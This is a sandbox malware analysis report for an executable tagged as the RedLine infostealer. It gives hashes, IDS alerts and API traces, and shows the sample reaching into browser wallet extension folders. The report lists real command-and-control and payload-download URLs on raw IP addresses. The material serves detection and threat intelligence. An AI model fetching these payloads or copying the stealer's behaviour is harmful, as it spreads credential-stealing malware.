Summary | ZeroBOX

66f0297e9c3eb_15.exe

Tags RedLine Infostealer, RedLine stealer, .NET framework(MSIL), Malicious Library, UPX, PWS, AntiDebug, PE File, OS Processor Check, PE32, .NET EXE, AntiVM
Category FILE
Machine s1_win7_x6403_us
Started Sept. 25, 2024, 10:45 a.m.
Completed Sept. 25, 2024, 11:08 a.m.
Size 10.5MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 38ef48a2e156067f1770497335e92066
SHA256 88efb8b6990e916e7590c2bd3f734f390f7c3d7b517a5fdc1baba0a2f6fbd54c
CRC32 8B426A03
ssdeep 196608:C1CmHo7PKWdP/7qEimwGZRKaP8xC3239GeFdJJMGHPP/CPZ5za/+qKcDxNY5fv7k:C1CmHOKWDqzKTKakxC323MeFV/m5zQAI
PDB Path vitosoft.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49169 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49169 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 104.237.62.213:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 104.237.62.213:443 -> 192.168.56.103:49168 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
UDP 192.168.56.103:50800 -> 164.124.101.2:53 2054168 ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49176 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 176.113.115.33:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49177 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 194.116.215.195:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 194.116.215.195:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49172 -> 104.26.9.59:443 2042969 ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49172 -> 104.26.9.59:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.37:80 -> 192.168.56.103:49182 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 192.168.56.103:49183 -> 104.192.140.26:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49187 -> 104.192.140.26:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 104.192.140.26:80 -> 192.168.56.103:49183 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 194.116.215.195:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 176.113.115.33:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 194.116.215.195:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 185.215.113.37:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49178 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 192.168.56.103:49177 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 185.215.113.37:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.37:80 -> 192.168.56.103:49182 2014819 ET INFO Packed Executable Download Misc activity
TCP 194.116.215.195:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.116.215.195:80 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 104.192.140.26:80 -> 192.168.56.103:49185 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 147.45.45.69:80 -> 192.168.56.103:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.37:80 -> 192.168.56.103:49182 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.45.69:80 -> 192.168.56.103:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.37:80 -> 192.168.56.103:49182 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.111.174.109:80 -> 192.168.56.103:49181 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.111.174.109:80 -> 192.168.56.103:49181 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.111.174.109:80 -> 192.168.56.103:49181 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2400007 ET DROP Spamhaus DROP Listed Traffic Inbound group 8 Misc Attack
TCP 192.168.56.103:49184 -> 104.192.140.26:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 176.113.115.33:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.33:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.113.115.33:80 -> 192.168.56.103:49179 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 104.192.140.26:80 -> 192.168.56.103:49184 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49180 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49180 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 104.192.140.26:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49178 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49178 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.44.104:80 -> 192.168.56.103:49178 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49180 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.44.104:80 -> 192.168.56.103:49180 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 147.45.45.69:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.45.69:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49178 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49180 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.45.69:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49169 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.103:49171 -> 104.26.4.15:443 | C=US, O=Google Trust Services, CN=WR1 | CN=db-ip.com | e0:87:2e:81:a3:0e:fe:55:82:41:57:b8:ff:b2:84:42:af:47:01:7c
TLSv1 192.168.56.103:49172 -> 104.26.9.59:443 | C=US, O=Google Trust Services, CN=WR1 | CN=myip.com | b3:80:cf:15:df:f5:53:6f:d4:e4:88:68:de:87:c0:e1:f8:3b:2c:02

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
pdb_path vitosoft.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .sdata
resource name DATAFILE
suspicious_features Connection to IP address suspicious_request GET http://45.91.200.135/api/wp-ping.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://45.91.200.135/api/wp-admin.php
suspicious_features Connection to IP address suspicious_request HEAD http://194.116.215.195/File.exe
suspicious_features Connection to IP address suspicious_request HEAD http://80.66.75.114/dl?name=inte
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.45.69/sdsdhggf.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.45.69/vdcsb.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/revada/66f3128883969_crypted.exe#1
suspicious_features Connection to IP address suspicious_request HEAD http://176.113.115.33/thebig/noode.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
suspicious_features Connection to IP address suspicious_request HEAD http://176.111.174.109/kurwa
suspicious_features Connection to IP address suspicious_request HEAD http://185.215.113.37/vera/nate.exe
suspicious_features Connection to IP address suspicious_request GET http://176.111.174.109/kurwa
suspicious_features Connection to IP address suspicious_request GET http://176.113.115.33/thebig/noode.exe
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.37/vera/nate.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.45.69/sdsdhggf.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.45.69/vdcsb.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
suspicious_features Connection to IP address suspicious_request GET http://194.116.215.195/File.exe
suspicious_features Connection to IP address suspicious_request GET http://80.66.75.114/dl?name=inte
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/revada/66f3128883969_crypted.exe#1
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.45.69/vdcsnjdh15.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.45.69/vdcsnjdh15.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
request GET http://45.91.200.135/api/wp-ping.php
request POST http://45.91.200.135/api/wp-admin.php
request HEAD http://194.116.215.195/File.exe
request HEAD http://80.66.75.114/dl?name=inte
request HEAD http://147.45.45.69/sdsdhggf.exe
request HEAD http://147.45.45.69/vdcsb.exe
request HEAD http://147.45.44.104/revada/66f3128883969_crypted.exe#1
request HEAD http://176.113.115.33/thebig/noode.exe
request HEAD http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
request HEAD http://176.111.174.109/kurwa
request HEAD http://185.215.113.37/vera/nate.exe
request GET http://176.111.174.109/kurwa
request GET http://176.113.115.33/thebig/noode.exe
request GET http://185.215.113.37/vera/nate.exe
request GET http://147.45.45.69/sdsdhggf.exe
request GET http://147.45.45.69/vdcsb.exe
request HEAD http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
request HEAD http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
request GET http://194.116.215.195/File.exe
request GET http://80.66.75.114/dl?name=inte
request HEAD http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
request GET http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
request HEAD http://240922164748184.tyr.zont16.com/f/fikbam0922184.exe
request GET http://147.45.44.104/revada/66f3128883969_crypted.exe#1
request GET http://240922164748184.tyr.zont16.com/f/fikbam0922184.exe
request GET http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
request HEAD http://147.45.45.69/vdcsnjdh15.exe
request GET http://147.45.45.69/vdcsnjdh15.exe
request GET http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
request GET https://db-ip.com/demo/home.php?s=
request GET https://api.myip.com/
request POST http://45.91.200.135/api/wp-admin.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00640000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00462000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00820000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0049b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00497000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00495000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00821000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00486000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0048a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00487000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0082d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0082e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73db4000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0082f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e77000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05896000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05897000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05898000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x747a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74751000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x756e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74731000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74721000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x746e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74691000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74341000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76971000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74fc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74331000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74251000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f91000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghpilmjholiicaobfjdkefcogmgaabif
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
